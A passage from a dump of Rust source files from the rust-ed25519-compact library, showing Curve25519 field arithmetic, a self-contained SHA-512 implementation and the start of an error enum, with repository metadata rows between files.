let x8: u64 = (x6 & 0x7ffffffffffff);
let x9: u64 = (x7 & 0x7ffffffffffff);
let x10: u64 = ((((x7 >> 51) as fiat_25519_u1) as u64).wrapping_add((x3 & 0x7ffffffffffff)));
let x11: u64 = (x4 & 0x7ffffffffffff);
let x12: u64 = (x5 & 0x7ffffffffffff);
out1[0] = x8;
out1[1] = x9;
out1[2] = x10;
out1[3] = x11;
out1[4] = x12;
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
pub fn fiat_25519_add(out1: &mut [u64; 5], arg1: &[u64; 5], arg2: &[u64; 5]) {
let x1: u64 = ((arg1[0]).wrapping_add((arg2[0])));
let x2: u64 = ((arg1[1]).wrapping_add((arg2[1])));
let x3: u64 = ((arg1[2]).wrapping_add((arg2[2])));
let x4: u64 = ((arg1[3]).wrapping_add((arg2[3])));
let x5: u64 = ((arg1[4]).wrapping_add((arg2[4])));
out1[0] = x1;
out1[1] = x2;
out1[2] = x3;
out1[3] = x4;
out1[4] = x5;
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
pub fn fiat_25519_sub(out1: &mut [u64; 5], arg1: &[u64; 5], arg2: &[u64; 5]) {
let x1: u64 = ((0xfffffffffffdau64.wrapping_add((arg1[0]))).wrapping_sub((arg2[0])));
let x2: u64 = ((0xffffffffffffeu64.wrapping_add((arg1[1]))).wrapping_sub((arg2[1])));
let x3: u64 = ((0xffffffffffffeu64.wrapping_add((arg1[2]))).wrapping_sub((arg2[2])));
let x4: u64 = ((0xffffffffffffeu64.wrapping_add((arg1[3]))).wrapping_sub((arg2[3])));
let x5: u64 = ((0xffffffffffffeu64.wrapping_add((arg1[4]))).wrapping_sub((arg2[4])));
out1[0] = x1;
out1[1] = x2;
out1[2] = x3;
out1[3] = x4;
out1[4] = x5;
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
pub fn fiat_25519_opp(out1: &mut [u64; 5], arg1: &[u64; 5]) {
let x1: u64 = (0xfffffffffffdau64.wrapping_sub((arg1[0])));
let x2: u64 = (0xffffffffffffeu64.wrapping_sub((arg1[1])));
let x3: u64 = (0xffffffffffffeu64.wrapping_sub((arg1[2])));
let x4: u64 = (0xffffffffffffeu64.wrapping_sub((arg1[3])));
let x5: u64 = (0xffffffffffffeu64.wrapping_sub((arg1[4])));
out1[0] = x1;
out1[1] = x2;
out1[2] = x3;
out1[3] = x4;
out1[4] = x5;
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
pub fn fiat_25519_selectznz(
out1: &mut [u64; 5],
arg1: fiat_25519_u1,
arg2: &[u64; 5],
arg3: &[u64; 5],
) {
let mut x1: u64 = 0;
fiat_25519_cmovznz_u64(&mut x1, arg1, (arg2[0]), (arg3[0]));
let mut x2: u64 = 0;
fiat_25519_cmovznz_u64(&mut x2, arg1, (arg2[1]), (arg3[1]));
let mut x3: u64 = 0;
fiat_25519_cmovznz_u64(&mut x3, arg1, (arg2[2]), (arg3[2]));
let mut x4: u64 = 0;
fiat_25519_cmovznz_u64(&mut x4, arg1, (arg2[3]), (arg3[3]));
let mut x5: u64 = 0;
fiat_25519_cmovznz_u64(&mut x5, arg1, (arg2[4]), (arg3[4]));
out1[0] = x1;
out1[1] = x2;
out1[2] = x3;
out1[3] = x4;
out1[4] = x5;
}
pub fn fiat_25519_to_bytes(out1: &mut [u8; 32], arg1: &[u64; 5]) {
let mut x1: u64 = 0;
let mut x2: fiat_25519_u1 = 0;
fiat_25519_subborrowx_u51(&mut x1, &mut x2, 0x0, (arg1[0]), 0x7ffffffffffed);
let mut x3: u64 = 0;
let mut x4: fiat_25519_u1 = 0;
fiat_25519_subborrowx_u51(&mut x3, &mut x4, x2, (arg1[1]), 0x7ffffffffffff);
let mut x5: u64 = 0;
let mut x6: fiat_25519_u1 = 0;
fiat_25519_subborrowx_u51(&mut x5, &mut x6, x4, (arg1[2]), 0x7ffffffffffff);
let mut x7: u64 = 0;
let mut x8: fiat_25519_u1 = 0;
fiat_25519_subborrowx_u51(&mut x7, &mut x8, x6, (arg1[3]), 0x7ffffffffffff);
let mut x9: u64 = 0;
let mut x10: fiat_25519_u1 = 0;
fiat_25519_subborrowx_u51(&mut x9, &mut x10, x8, (arg1[4]), 0x7ffffffffffff);
let mut x11: u64 = 0;
fiat_25519_cmovznz_u64(&mut x11, x10, 0x0_u64, 0xffffffffffffffff);
let mut x12: u64 = 0;
let mut x13: fiat_25519_u1 = 0;
fiat_25519_addcarryx_u51(&mut x12, &mut x13, 0x0, x1, (x11 & 0x7ffffffffffed));
let mut x14: u64 = 0;
let mut x15: fiat_25519_u1 = 0;
fiat_25519_addcarryx_u51(&mut x14, &mut x15, x13, x3, (x11 & 0x7ffffffffffff));
let mut x16: u64 = 0;
let mut x17: fiat_25519_u1 = 0;
fiat_25519_addcarryx_u51(&mut x16, &mut x17, x15, x5, (x11 & 0x7ffffffffffff));
let mut x18: u64 = 0;
let mut x19: fiat_25519_u1 = 0;
fiat_25519_addcarryx_u51(&mut x18, &mut x19, x17, x7, (x11 & 0x7ffffffffffff));
let mut x20: u64 = 0;
let mut x21: fiat_25519_u1 = 0;
fiat_25519_addcarryx_u51(&mut x20, &mut x21, x19, x9, (x11 & 0x7ffffffffffff));
let x22: u64 = (x20 << 4);
let x23: u64 = (x18.wrapping_mul(0x2_u64));
let x24: u64 = (x16 << 6);
let x25: u64 = (x14 << 3);
let x26: u8 = ((x12 & 0xff_u64) as u8);
let x27: u64 = (x12 >> 8);
let x28: u8 = ((x27 & 0xff_u64) as u8);
let x29: u64 = (x27 >> 8);
let x30: u8 = ((x29 & 0xff_u64) as u8);
let x31: u64 = (x29 >> 8);
let x32: u8 = ((x31 & 0xff_u64) as u8);
let x33: u64 = (x31 >> 8);
let x34: u8 = ((x33 & 0xff_u64) as u8);
let x35: u64 = (x33 >> 8);
let x36: u8 = ((x35 & 0xff_u64) as u8);
let x37: u8 = ((x35 >> 8) as u8);
let x38: u64 = (x25.wrapping_add((x37 as u64)));
let x39: u8 = ((x38 & 0xff_u64) as u8);
let x40: u64 = (x38 >> 8);
let x41: u8 = ((x40 & 0xff_u64) as u8);
let x42: u64 = (x40 >> 8);
let x43: u8 = ((x42 & 0xff_u64) as u8);
let x44: u64 = (x42 >> 8);
let x45: u8 = ((x44 & 0xff_u64) as u8);
let x46: u64 = (x44 >> 8);
let x47: u8 = ((x46 & 0xff_u64) as u8);
let x48: u64 = (x46 >> 8);
let x49: u8 = ((x48 & 0xff_u64) as u8);
let x50: u8 = ((x48 >> 8) as u8);
let x51: u64 = (x24.wrapping_add((x50 as u64)));
let x52: u8 = ((x51 & 0xff_u64) as u8);
let x53: u64 = (x51 >> 8);
let x54: u8 = ((x53 & 0xff_u64) as u8);
let x55: u64 = (x53 >> 8);
let x56: u8 = ((x55 & 0xff_u64) as u8);
let x57: u64 = (x55 >> 8);
let x58: u8 = ((x57 & 0xff_u64) as u8);
let x59: u64 = (x57 >> 8);
let x60: u8 = ((x59 & 0xff_u64) as u8);
let x61: u64 = (x59 >> 8);
let x62: u8 = ((x61 & 0xff_u64) as u8);
let x63: u64 = (x61 >> 8);
let x64: u8 = ((x63 & 0xff_u64) as u8);
let x65: fiat_25519_u1 = ((x63 >> 8) as fiat_25519_u1);
let x66: u64 = (x23.wrapping_add((x65 as u64)));
let x67: u8 = ((x66 & 0xff_u64) as u8);
let x68: u64 = (x66 >> 8);
let x69: u8 = ((x68 & 0xff_u64) as u8);
let x70: u64 = (x68 >> 8);
let x71: u8 = ((x70 & 0xff_u64) as u8);
let x72: u64 = (x70 >> 8);
let x73: u8 = ((x72 & 0xff_u64) as u8);
let x74: u64 = (x72 >> 8);
let x75: u8 = ((x74 & 0xff_u64) as u8);
let x76: u64 = (x74 >> 8);
let x77: u8 = ((x76 & 0xff_u64) as u8);
let x78: u8 = ((x76 >> 8) as u8);
let x79: u64 = (x22.wrapping_add((x78 as u64)));
let x80: u8 = ((x79 & 0xff_u64) as u8);
let x81: u64 = (x79 >> 8);
let x82: u8 = ((x81 & 0xff_u64) as u8);
let x83: u64 = (x81 >> 8);
let x84: u8 = ((x83 & 0xff_u64) as u8);
let x85: u64 = (x83 >> 8);
let x86: u8 = ((x85 & 0xff_u64) as u8);
let x87: u64 = (x85 >> 8);
let x88: u8 = ((x87 & 0xff_u64) as u8);
let x89: u64 = (x87 >> 8);
let x90: u8 = ((x89 & 0xff_u64) as u8);
let x91: u8 = ((x89 >> 8) as u8);
out1[0] = x26;
out1[1] = x28;
out1[2] = x30;
out1[3] = x32;
out1[4] = x34;
out1[5] = x36;
out1[6] = x39;
out1[7] = x41;
out1[8] = x43;
out1[9] = x45;
out1[10] = x47;
out1[11] = x49;
out1[12] = x52;
out1[13] = x54;
out1[14] = x56;
out1[15] = x58;
out1[16] = x60;
out1[17] = x62;
out1[18] = x64;
out1[19] = x67;
out1[20] = x69;
out1[21] = x71;
out1[22] = x73;
out1[23] = x75;
out1[24] = x77;
out1[25] = x80;
out1[26] = x82;
out1[27] = x84;
out1[28] = x86;
out1[29] = x88;
out1[30] = x90;
out1[31] = x91;
}
#[derive(Clone, Default, Copy)]
pub struct Fe(pub [u64; 5]);
impl PartialEq for Fe {
fn eq(&self, other: &Fe) -> bool {
let &Fe(self_elems) = self;
let &Fe(other_elems) = other;
self_elems == other_elems
}
}
impl Eq for Fe {}
pub static FE_ZERO: Fe = Fe([0, 0, 0, 0, 0]);
pub static FE_ONE: Fe = Fe([1, 0, 0, 0, 0]);
pub static FE_SQRTM1: Fe = Fe([
1718705420411056,
234908883556509,
2233514472574048,
2117202627021982,
765476049583133,
]);
pub(crate) static FE_D: Fe = Fe([
929955233495203,
466365720129213,
1662059464998953,
2033849074728123,
1442794654840575,
]);
pub(crate) static FE_D2: Fe = Fe([
1859910466990425,
932731440258426,
1072319116312658,
1815898335770999,
633789495995903,
]);
#[cfg(feature = "x25519")]
pub(crate) static FE_CURVE25519_BASEPOINT: Fe = Fe([9, 0, 0, 0, 0]);
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
fn load_8u(s: &[u8]) -> u64 {
(s[0] as u64)
| ((s[1] as u64) << 8)
| ((s[2] as u64) << 16)
| ((s[3] as u64) << 24)
| ((s[4] as u64) << 32)
| ((s[5] as u64) << 40)
| ((s[6] as u64) << 48)
| ((s[7] as u64) << 56)
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
pub fn load_4u(s: &[u8]) -> u64 {
(s[0] as u64) | ((s[1] as u64) << 8) | ((s[2] as u64) << 16) | ((s[3] as u64) << 24)
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
pub fn load_4i(s: &[u8]) -> i64 {
load_4u(s) as i64
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
pub fn load_3u(s: &[u8]) -> u64 {
(s[0] as u64) | ((s[1] as u64) << 8) | ((s[2] as u64) << 16)
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
pub fn load_3i(s: &[u8]) -> i64 {
load_3u(s) as i64
}
impl Add for Fe {
type Output = Fe;
fn add(self, _rhs: Fe) -> Fe {
let Fe(f) = self;
let Fe(g) = _rhs;
let mut h = Fe::default();
fiat_25519_add(&mut h.0, &f, &g);
h
}
}
impl Sub for Fe {
type Output = Fe;
fn sub(self, _rhs: Fe) -> Fe {
let Fe(f) = self;
let Fe(g) = _rhs;
let mut h = Fe::default();
fiat_25519_sub(&mut h.0, &f, &g);
h.carry()
}
}
impl Mul for Fe {
type Output = Fe;
fn mul(self, _rhs: Fe) -> Fe {
let Fe(f) = self;
let Fe(g) = _rhs;
let mut h = Fe::default();
fiat_25519_carry_mul(&mut h.0, &f, &g);
h
}
}
impl Fe {
pub fn from_bytes(s: &[u8]) -> Fe {
if s.len() != 32 {
panic!("Invalid compressed length")
}
let mut h = Fe::default();
let mask = 0x7ffffffffffff;
h.0[0] = load_8u(&s[0..]) & mask;
h.0[1] = (load_8u(&s[6..]) >> 3) & mask;
h.0[2] = (load_8u(&s[12..]) >> 6) & mask;
h.0[3] = (load_8u(&s[19..]) >> 1) & mask;
h.0[4] = (load_8u(&s[24..]) >> 12) & mask;
h
}
pub fn to_bytes(&self) -> [u8; 32] {
let &Fe(es) = &self.carry();
let mut s_ = [0u8; 32];
fiat_25519_to_bytes(&mut s_, &es);
s_
}
pub fn carry(&self) -> Fe {
let mut h = Fe::default();
fiat_25519_carry(&mut h.0, &self.0);
h
}
pub fn maybe_set(&mut self, other: &Fe, do_swap: u8) {
let &mut Fe(f) = self;
let &Fe(g) = other;
let mut t = [0u64; 5];
fiat_25519_selectznz(&mut t, do_swap, &f, &g);
self.0 = t
}
pub fn square(&self) -> Fe {
let &Fe(f) = &self;
let mut h = Fe::default();
fiat_25519_carry_square(&mut h.0, f);
h
}
pub fn square_and_double(&self) -> Fe {
let h = self.square();
(h + h)
}
pub fn invert(&self) -> Fe {
let z1 = *self;
let z2 = z1.square();
let z8 = z2.square().square();
let z9 = z1 * z8;
let z11 = z2 * z9;
let z22 = z11.square();
let z_5_0 = z9 * z22;
let z_10_5 = (0..5).fold(z_5_0, |z_5_n, _| z_5_n.square());
let z_10_0 = z_10_5 * z_5_0;
let z_20_10 = (0..10).fold(z_10_0, |x, _| x.square());
let z_20_0 = z_20_10 * z_10_0;
let z_40_20 = (0..20).fold(z_20_0, |x, _| x.square());
let z_40_0 = z_40_20 * z_20_0;
let z_50_10 = (0..10).fold(z_40_0, |x, _| x.square());
let z_50_0 = z_50_10 * z_10_0;
let z_100_50 = (0..50).fold(z_50_0, |x, _| x.square());
let z_100_0 = z_100_50 * z_50_0;
let z_200_100 = (0..100).fold(z_100_0, |x, _| x.square());
let z_200_0 = z_200_100 * z_100_0;
let z_250_50 = (0..50).fold(z_200_0, |x, _| x.square());
let z_250_0 = z_250_50 * z_50_0;
let z_255_5 = (0..5).fold(z_250_0, |x, _| x.square());
let z_255_21 = z_255_5 * z11;
z_255_21
}
pub fn is_zero(&self) -> bool {
self.to_bytes().iter().fold(0, |acc, x| acc | x) == 0
}
pub fn is_negative(&self) -> bool {
(self.to_bytes()[0] & 1) != 0
}
pub fn neg(&self) -> Fe {
let &Fe(f) = &self;
let mut h = Fe::default();
fiat_25519_opp(&mut h.0, f);
h
}
pub fn pow25523(&self) -> Fe {
let z2 = self.square();
let z8 = (0..2).fold(z2, |x, _| x.square());
let z9 = *self * z8;
let z11 = z2 * z9;
let z22 = z11.square();
let z_5_0 = z9 * z22;
let z_10_5 = (0..5).fold(z_5_0, |x, _| x.square());
let z_10_0 = z_10_5 * z_5_0;
let z_20_10 = (0..10).fold(z_10_0, |x, _| x.square());
let z_20_0 = z_20_10 * z_10_0;
let z_40_20 = (0..20).fold(z_20_0, |x, _| x.square());
let z_40_0 = z_40_20 * z_20_0;
let z_50_10 = (0..10).fold(z_40_0, |x, _| x.square());
let z_50_0 = z_50_10 * z_10_0;
let z_100_50 = (0..50).fold(z_50_0, |x, _| x.square());
let z_100_0 = z_100_50 * z_50_0;
let z_200_100 = (0..100).fold(z_100_0, |x, _| x.square());
let z_200_0 = z_200_100 * z_100_0;
let z_250_50 = (0..50).fold(z_200_0, |x, _| x.square());
let z_250_0 = z_250_50 * z_50_0;
let z_252_2 = (0..2).fold(z_250_0, |x, _| x.square());
let z_252_3 = z_252_2 * *self;
z_252_3
}
#[cfg(feature = "x25519")]
#[inline]
pub fn cswap2(a0: &mut Fe, b0: &mut Fe, a1: &mut Fe, b1: &mut Fe, c: u8) {
let mask: u64 = 0u64.wrapping_sub(c as _);
let mut x0 = *a0;
let mut x1 = *a1;
for i in 0..5 {
x0.0[i] ^= b0.0[i];
x1.0[i] ^= b1.0[i];
}
for i in 0..5 {
x0.0[i] &= mask;
x1.0[i] &= mask;
}
for i in 0..5 {
a0.0[i] ^= x0.0[i];
b0.0[i] ^= x0.0[i];
a1.0[i] ^= x1.0[i];
b1.0[i] ^= x1.0[i];
}
}
#[cfg(feature = "x25519")]
#[inline]
pub fn mul32(&self, n: u32) -> Fe {
let sn = n as u128;
let mut fe = Fe::default();
let mut x: u128 = 8;
for i in 0..5 {
x = self.0[i] as u128 * sn + (x >> 51);
fe.0[i] = (x as u64) & 0x7ffffffffffff;
}
fe.0[0] += (x >> 51) as u64 * 19;
fe
}
pub fn reject_noncanonical(s: &[u8]) -> Result<(), Error> {
if s.len() != 32 {
panic!("Invalid compressed length")
}
let mut c = s[31];
c ^= 0x7f;
let mut i: usize = 30;
while i > 0 {
c |= s[i] ^ 0xff;
i -= 1;
}
c = ((c as u16).wrapping_sub(1) >> 8) as u8;
let d = (((0xed - 1) as u16).wrapping_sub(s[0] as u16) >> 8) as u8;
if c & d & 1 == 0 {
Ok(())
} else {
Err(Error::NonCanonical)
}
}
}
| rust | MIT | 661a45223bece49b3ad8da33fe0f3a408ea895c1 | 2026-01-04T20:21:43.974864Z | false |
jedisct1/rust-ed25519-compact | https://github.com/jedisct1/rust-ed25519-compact/blob/661a45223bece49b3ad8da33fe0f3a408ea895c1/src/sha512.rs | src/sha512.rs | //! A small, self-contained SHA512 implementation
//! (C) Frank Denis, public domain
#![allow(
non_snake_case,
clippy::cast_lossless,
clippy::eq_op,
clippy::identity_op,
clippy::many_single_char_names,
clippy::unreadable_literal
)]
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline(always))]
fn load_be(base: &[u8], offset: usize) -> u64 {
let addr = &base[offset..];
(addr[7] as u64)
| (addr[6] as u64) << 8
| (addr[5] as u64) << 16
| (addr[4] as u64) << 24
| (addr[3] as u64) << 32
| (addr[2] as u64) << 40
| (addr[1] as u64) << 48
| (addr[0] as u64) << 56
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline(always))]
fn store_be(base: &mut [u8], offset: usize, x: u64) {
let addr = &mut base[offset..];
addr[7] = x as u8;
addr[6] = (x >> 8) as u8;
addr[5] = (x >> 16) as u8;
addr[4] = (x >> 24) as u8;
addr[3] = (x >> 32) as u8;
addr[2] = (x >> 40) as u8;
addr[1] = (x >> 48) as u8;
addr[0] = (x >> 56) as u8;
}
struct W([u64; 16]);
#[derive(Copy, Clone)]
struct State([u64; 8]);
impl W {
fn new(input: &[u8]) -> Self {
let mut w = [0u64; 16];
for (i, e) in w.iter_mut().enumerate() {
*e = load_be(input, i * 8)
}
W(w)
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline(always))]
fn Ch(x: u64, y: u64, z: u64) -> u64 {
(x & y) ^ (!x & z)
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline(always))]
fn Maj(x: u64, y: u64, z: u64) -> u64 {
(x & y) ^ (x & z) ^ (y & z)
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline(always))]
fn Sigma0(x: u64) -> u64 {
x.rotate_right(28) ^ x.rotate_right(34) ^ x.rotate_right(39)
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline(always))]
fn Sigma1(x: u64) -> u64 {
x.rotate_right(14) ^ x.rotate_right(18) ^ x.rotate_right(41)
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline(always))]
fn sigma0(x: u64) -> u64 {
x.rotate_right(1) ^ x.rotate_right(8) ^ (x >> 7)
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline(always))]
fn sigma1(x: u64) -> u64 {
x.rotate_right(19) ^ x.rotate_right(61) ^ (x >> 6)
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline(always))]
fn M(&mut self, a: usize, b: usize, c: usize, d: usize) {
let w = &mut self.0;
w[a] = w[a]
.wrapping_add(Self::sigma1(w[b]))
.wrapping_add(w[c])
.wrapping_add(Self::sigma0(w[d]));
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline(always))]
fn expand(&mut self) {
self.M(0, (0 + 14) & 15, (0 + 9) & 15, (0 + 1) & 15);
self.M(1, (1 + 14) & 15, (1 + 9) & 15, (1 + 1) & 15);
self.M(2, (2 + 14) & 15, (2 + 9) & 15, (2 + 1) & 15);
self.M(3, (3 + 14) & 15, (3 + 9) & 15, (3 + 1) & 15);
self.M(4, (4 + 14) & 15, (4 + 9) & 15, (4 + 1) & 15);
self.M(5, (5 + 14) & 15, (5 + 9) & 15, (5 + 1) & 15);
self.M(6, (6 + 14) & 15, (6 + 9) & 15, (6 + 1) & 15);
self.M(7, (7 + 14) & 15, (7 + 9) & 15, (7 + 1) & 15);
self.M(8, (8 + 14) & 15, (8 + 9) & 15, (8 + 1) & 15);
self.M(9, (9 + 14) & 15, (9 + 9) & 15, (9 + 1) & 15);
self.M(10, (10 + 14) & 15, (10 + 9) & 15, (10 + 1) & 15);
self.M(11, (11 + 14) & 15, (11 + 9) & 15, (11 + 1) & 15);
self.M(12, (12 + 14) & 15, (12 + 9) & 15, (12 + 1) & 15);
self.M(13, (13 + 14) & 15, (13 + 9) & 15, (13 + 1) & 15);
self.M(14, (14 + 14) & 15, (14 + 9) & 15, (14 + 1) & 15);
self.M(15, (15 + 14) & 15, (15 + 9) & 15, (15 + 1) & 15);
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline(always))]
fn F(&mut self, state: &mut State, i: usize, k: u64) {
let t = &mut state.0;
t[(16 - i + 7) & 7] = t[(16 - i + 7) & 7]
.wrapping_add(Self::Sigma1(t[(16 - i + 4) & 7]))
.wrapping_add(Self::Ch(
t[(16 - i + 4) & 7],
t[(16 - i + 5) & 7],
t[(16 - i + 6) & 7],
))
.wrapping_add(k)
.wrapping_add(self.0[i]);
t[(16 - i + 3) & 7] = t[(16 - i + 3) & 7].wrapping_add(t[(16 - i + 7) & 7]);
t[(16 - i + 7) & 7] = t[(16 - i + 7) & 7]
.wrapping_add(Self::Sigma0(t[(16 - i + 0) & 7]))
.wrapping_add(Self::Maj(
t[(16 - i + 0) & 7],
t[(16 - i + 1) & 7],
t[(16 - i + 2) & 7],
));
}
fn G(&mut self, state: &mut State, s: usize) {
const ROUND_CONSTANTS: [u64; 80] = [
0x428a2f98d728ae22,
0x7137449123ef65cd,
0xb5c0fbcfec4d3b2f,
0xe9b5dba58189dbbc,
0x3956c25bf348b538,
0x59f111f1b605d019,
0x923f82a4af194f9b,
0xab1c5ed5da6d8118,
0xd807aa98a3030242,
0x12835b0145706fbe,
0x243185be4ee4b28c,
0x550c7dc3d5ffb4e2,
0x72be5d74f27b896f,
0x80deb1fe3b1696b1,
0x9bdc06a725c71235,
0xc19bf174cf692694,
0xe49b69c19ef14ad2,
0xefbe4786384f25e3,
0x0fc19dc68b8cd5b5,
0x240ca1cc77ac9c65,
0x2de92c6f592b0275,
0x4a7484aa6ea6e483,
0x5cb0a9dcbd41fbd4,
0x76f988da831153b5,
0x983e5152ee66dfab,
0xa831c66d2db43210,
0xb00327c898fb213f,
0xbf597fc7beef0ee4,
0xc6e00bf33da88fc2,
0xd5a79147930aa725,
0x06ca6351e003826f,
0x142929670a0e6e70,
0x27b70a8546d22ffc,
0x2e1b21385c26c926,
0x4d2c6dfc5ac42aed,
0x53380d139d95b3df,
0x650a73548baf63de,
0x766a0abb3c77b2a8,
0x81c2c92e47edaee6,
0x92722c851482353b,
0xa2bfe8a14cf10364,
0xa81a664bbc423001,
0xc24b8b70d0f89791,
0xc76c51a30654be30,
0xd192e819d6ef5218,
0xd69906245565a910,
0xf40e35855771202a,
0x106aa07032bbd1b8,
0x19a4c116b8d2d0c8,
0x1e376c085141ab53,
0x2748774cdf8eeb99,
0x34b0bcb5e19b48a8,
0x391c0cb3c5c95a63,
0x4ed8aa4ae3418acb,
0x5b9cca4f7763e373,
0x682e6ff3d6b2b8a3,
0x748f82ee5defb2fc,
0x78a5636f43172f60,
0x84c87814a1f0ab72,
0x8cc702081a6439ec,
0x90befffa23631e28,
0xa4506cebde82bde9,
0xbef9a3f7b2c67915,
0xc67178f2e372532b,
0xca273eceea26619c,
0xd186b8c721c0c207,
0xeada7dd6cde0eb1e,
0xf57d4f7fee6ed178,
0x06f067aa72176fba,
0x0a637dc5a2c898a6,
0x113f9804bef90dae,
0x1b710b35131c471b,
0x28db77f523047d84,
0x32caab7b40c72493,
0x3c9ebe0a15c9bebc,
0x431d67c49c100d4c,
0x4cc5d4becb3e42b6,
0x597f299cfc657e2a,
0x5fcb6fab3ad6faec,
0x6c44198c4a475817,
];
let rc = &ROUND_CONSTANTS[s * 16..];
self.F(state, 0, rc[0]);
self.F(state, 1, rc[1]);
self.F(state, 2, rc[2]);
self.F(state, 3, rc[3]);
self.F(state, 4, rc[4]);
self.F(state, 5, rc[5]);
self.F(state, 6, rc[6]);
self.F(state, 7, rc[7]);
self.F(state, 8, rc[8]);
self.F(state, 9, rc[9]);
self.F(state, 10, rc[10]);
self.F(state, 11, rc[11]);
self.F(state, 12, rc[12]);
self.F(state, 13, rc[13]);
self.F(state, 14, rc[14]);
self.F(state, 15, rc[15]);
}
}
impl State {
fn new() -> Self {
const IV: [u8; 64] = [
0x6a, 0x09, 0xe6, 0x67, 0xf3, 0xbc, 0xc9, 0x08, 0xbb, 0x67, 0xae, 0x85, 0x84, 0xca,
0xa7, 0x3b, 0x3c, 0x6e, 0xf3, 0x72, 0xfe, 0x94, 0xf8, 0x2b, 0xa5, 0x4f, 0xf5, 0x3a,
0x5f, 0x1d, 0x36, 0xf1, 0x51, 0x0e, 0x52, 0x7f, 0xad, 0xe6, 0x82, 0xd1, 0x9b, 0x05,
0x68, 0x8c, 0x2b, 0x3e, 0x6c, 0x1f, 0x1f, 0x83, 0xd9, 0xab, 0xfb, 0x41, 0xbd, 0x6b,
0x5b, 0xe0, 0xcd, 0x19, 0x13, 0x7e, 0x21, 0x79,
];
let mut t = [0u64; 8];
for (i, e) in t.iter_mut().enumerate() {
*e = load_be(&IV, i * 8)
}
State(t)
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline(always))]
fn add(&mut self, x: &State) {
let sx = &mut self.0;
let ex = &x.0;
sx[0] = sx[0].wrapping_add(ex[0]);
sx[1] = sx[1].wrapping_add(ex[1]);
sx[2] = sx[2].wrapping_add(ex[2]);
sx[3] = sx[3].wrapping_add(ex[3]);
sx[4] = sx[4].wrapping_add(ex[4]);
sx[5] = sx[5].wrapping_add(ex[5]);
sx[6] = sx[6].wrapping_add(ex[6]);
sx[7] = sx[7].wrapping_add(ex[7]);
}
fn store(&self, out: &mut [u8]) {
for (i, &e) in self.0.iter().enumerate() {
store_be(out, i * 8, e);
}
}
fn blocks(&mut self, mut input: &[u8]) -> usize {
let mut t = *self;
let mut inlen = input.len();
while inlen >= 128 {
let mut w = W::new(input);
w.G(&mut t, 0);
w.expand();
w.G(&mut t, 1);
w.expand();
w.G(&mut t, 2);
w.expand();
w.G(&mut t, 3);
w.expand();
w.G(&mut t, 4);
t.add(self);
self.0 = t.0;
input = &input[128..];
inlen -= 128;
}
inlen
}
}
#[derive(Copy, Clone)]
pub struct Hash {
state: State,
w: [u8; 128],
r: usize,
len: usize,
}
impl Hash {
pub fn new() -> Hash {
Hash {
state: State::new(),
r: 0,
w: [0u8; 128],
len: 0,
}
}
/// Absorb content
pub fn update<T: AsRef<[u8]>>(&mut self, input: T) {
let input = input.as_ref();
let mut n = input.len();
self.len += n;
let av = 128 - self.r;
let tc = ::core::cmp::min(n, av);
self.w[self.r..self.r + tc].copy_from_slice(&input[0..tc]);
self.r += tc;
n -= tc;
let pos = tc;
if self.r == 128 {
self.state.blocks(&self.w);
self.r = 0;
}
if self.r == 0 && n > 0 {
let rb = self.state.blocks(&input[pos..]);
if rb > 0 {
self.w[..rb].copy_from_slice(&input[pos + n - rb..]);
self.r = rb;
}
}
}
/// Compute SHA512(absorbed content)
pub fn finalize(mut self) -> [u8; 64] {
let mut padded = [0u8; 256];
padded[..self.r].copy_from_slice(&self.w[..self.r]);
padded[self.r] = 0x80;
let r = if self.r < 112 { 128 } else { 256 };
let bits = self.len * 8;
for i in 0..8 {
padded[r - 8 + i] = (bits as u64 >> (56 - i * 8)) as u8;
}
self.state.blocks(&padded[..r]);
let mut out = [0u8; 64];
self.state.store(&mut out);
out
}
/// Compute SHA512(`input`)
pub fn hash<T: AsRef<[u8]>>(input: T) -> [u8; 64] {
let mut h = Hash::new();
h.update(input);
h.finalize()
}
}
impl Default for Hash {
fn default() -> Self {
Self::new()
}
}
| rust | MIT | 661a45223bece49b3ad8da33fe0f3a408ea895c1 | 2026-01-04T20:21:43.974864Z | false |
jedisct1/rust-ed25519-compact | https://github.com/jedisct1/rust-ed25519-compact/blob/661a45223bece49b3ad8da33fe0f3a408ea895c1/src/error.rs | src/error.rs | use core::fmt::{self, Display};
#[derive(Debug, Copy, Clone, Eq, PartialEq)]
pub enum Error {
/// The signature doesn't verify.
SignatureMismatch,
/// A weak public key was used.
WeakPublicKey,
/// The public key is invalid.
InvalidPublicKey,
/// The secret key is invalid.
InvalidSecretKey,
/// The signature is invalid.
InvalidSignature,
/// The seed doesn't have the expected length.
InvalidSeed,
/// The blind doesn't have the expected length.
InvalidBlind,
